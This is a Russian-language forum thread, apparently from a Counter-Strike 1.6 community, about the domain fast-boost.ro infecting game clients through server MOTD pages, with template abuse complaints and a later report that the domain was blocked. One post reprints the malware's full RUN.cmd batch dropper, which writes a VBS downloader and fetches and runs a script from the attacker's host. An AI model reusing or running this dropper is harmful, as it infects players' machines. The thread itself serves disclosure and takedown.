fast-boost[.]ro

Статус
В этой теме нельзя размещать новые ответы.

ifx

Сообщения
330
Реакции
149
Помог
4 раз(а)
Всем привет, поднадоели подмены мс от румынов, сегодня очередная подмена была, попали все более-менее крупные мониторинги - https://c-s.net.ua/forum/topic87997s8820.html#entry1092865
В связи с этим предлагаю накидать жалоб на почту хостинг-регистратору, чтобы домен заблочили, а зодно и хостеру, на котором сейчас находится домен

кому лень делать все самому, копируйте текст ниже на 2 почты

[email protected]

Hello from Russia
this domain send viruses to game-servers counter-strike 1.6 and infect game clients
pls stop host it
im attach image and link on dat image, that upload to game client and infect virus

--------------------------
[email protected]

Добрый день
этот домен распространяет вирусы через игровой сервер counter-strike 1.6 и заражает клиент игры
пожалуйста прекратите хостить его
в аттаче картинка и ссылка на заражаемый файл клиентом, который скачивается автоматически, при входе в игру

Screenshot_1.pngScreenshot_2.png

-----------------
UPD
ответ от ру-хостера уже пришел, ждем


Screenshot_3.png

UPD2
с сервера выше подмену убрали, но файл все также доступен


новый файл) и ссылка - http://fast-boost.ro/cmd/RUN.cmd

Код:
@echo off

set DLOAD_SCRIPT=download.vbs
echo Option Explicit                                                    >  %DLOAD_SCRIPT%
echo Dim args, http, fileSystem, adoStream, url, target, status         >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set args = Wscript.Arguments                                       >> %DLOAD_SCRIPT%
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1")              >> %DLOAD_SCRIPT%
echo url = args(0)                                                      >> %DLOAD_SCRIPT%
echo target = args(1)                                                   >> %DLOAD_SCRIPT%
echo WScript.Echo "Getting '" ^& target ^& "' from '" ^& url ^& "'..."  >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo http.Open "GET", url, False                                        >> %DLOAD_SCRIPT%
echo http.Send                                                          >> %DLOAD_SCRIPT%
echo status = http.Status                                               >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo If status ^<^> 200 Then                                            >> %DLOAD_SCRIPT%
echo     WScript.Echo "FAILED to download: HTTP Status " ^& status       >> %DLOAD_SCRIPT%
echo     WScript.Quit 1                                                  >> %DLOAD_SCRIPT%
echo End If                                                             >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set adoStream = CreateObject("ADODB.Stream")                       >> %DLOAD_SCRIPT%
echo adoStream.Open                                                     >> %DLOAD_SCRIPT%
echo adoStream.Type = 1                                                 >> %DLOAD_SCRIPT%
echo adoStream.Write http.ResponseBody                                  >> %DLOAD_SCRIPT%
echo adoStream.Position = 0                                             >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set fileSystem = CreateObject("Scripting.FileSystemObject")        >> %DLOAD_SCRIPT%
echo If fileSystem.FileExists(target) Then fileSystem.DeleteFile target >> %DLOAD_SCRIPT%
echo adoStream.SaveToFile target                                        >> %DLOAD_SCRIPT%
echo adoStream.Close                                                    >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%

cscript //Nologo %DLOAD_SCRIPT% http://fast-boost.ro/ms/click_run.vbs down.vbs

start down.vbs
 
Последнее редактирование:

ifx

Сообщения
330
Реакции
149
Помог
4 раз(а)
кроме Dr.Web, также эту заразу теперь будет детектить Касперский
 

Вложения

Сообщения
263
Реакции
342
1731417315
Таких белонардов штук 5 у себя выловил, возможности проверить диск C нету полностью, синий экран возникает.
А так, никогда не думал, что можно загружать вирусы через кс, просто зайдя на сервер, ужас.
 
Сообщения
1,106
Реакции
319

Garey

ninjaCow
Сообщения
411
Реакции
1,051
Помог
10 раз(а)
стим тоже заражает?
 

ifx

Сообщения
330
Реакции
149
Помог
4 раз(а)
Garey, по идее нет, в стиме мотд просто блочится, показывая пустое окно
проблема актуальна только для 4554 билдов
 
Сообщения
263
Реакции
342
Garey, по идее нет, в стиме мотд просто блочится, показывая пустое окно
проблема актуальна только для 4554 билдов
Странно, я только со стим клиента и сижу, однако, как видишь)
Помню на какой-т осервер зашел к товарищу, у меня из кс вылетело после захода на сервер, естественно все кфг битые, точно не помню, но вроде она даже не запускалась после этого(только переустановить), а если и запускалась, то лагало.
 

ifx

Сообщения
330
Реакции
149
Помог
4 раз(а)
домен fast-boost.ro заблочен, спасибо всем кто помогал!

Screenshot_3.png
 
Статус
В этой теме нельзя размещать новые ответы.

Пользователи, просматривающие эту тему

Сейчас на форуме нет ни одного пользователя.
Сверху Снизу